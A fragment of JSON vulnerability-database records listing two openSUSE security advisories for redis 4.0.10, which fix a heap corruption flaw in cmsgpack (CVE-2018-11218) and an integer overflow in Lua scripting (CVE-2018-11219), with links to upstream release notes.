href=\"https://raw.githubusercontent.com/antirez/redis/4.0.8/00-RELEASENOTES\">https://raw.githubusercontent.com/antirez/redis/4.0.8/00-RELEASENOTES</a>\n - <a rel=\"nofollow\" href=\"https://raw.githubusercontent.com/antirez/redis/4.0.7/00-RELEASENOTES\">https://raw.githubusercontent.com/antirez/redis/4.0.7/00-RELEASENOTES</a>\n\n", "modified": "2018-06-23T03:13:07", "published": "2018-06-23T03:13:07", "id": "OPENSUSE-SU-2018:1802-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00043.html", "type": "suse", "title": "Security update for redis (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-06-23T06:01:17", "bulletinFamily": "unix", "cvelist": ["CVE-2018-11218", "CVE-2018-11219"], "description": "This update for redis to 4.0.10 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-11218: Prevent heap corruption vulnerability in cmsgpack\n (bsc#1097430).\n - CVE-2018-11219: Prevent integer overflow in Lua scripting (bsc#1097768).\n\n For Leap 42.3 and openSUSE SLE 12 backports this is a jump from 4.0.6. For\n additional details please see\n\n - <a rel=\"nofollow\" href=\"https://raw.githubusercontent.com/antirez/redis/4.0.9/00-RELEASENOTES\">https://raw.githubusercontent.com/antirez/redis/4.0.9/00-RELEASENOTES</a>\n - <a rel=\"nofollow\" href=\"https://raw.githubusercontent.com/antirez/redis/4.0.8/00-RELEASENOTES\">https://raw.githubusercontent.com/antirez/redis/4.0.8/00-RELEASENOTES</a>\n - <a rel=\"nofollow\" href=\"https://raw.githubusercontent.com/antirez/redis/4.0.7/00-RELEASENOTES\">https://raw.githubusercontent.com/antirez/redis/4.0.7/00-RELEASENOTES</a>\n\n", "modified": "2018-06-23T03:08:31", "published": "2018-06-23T03:08:31", "id": "OPENSUSE-SU-2018:1794-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00041.html", "type": "suse", "title": "Security update for redis (important)", "cvss": {"score": 0.0, "vector": "NONE"}}]}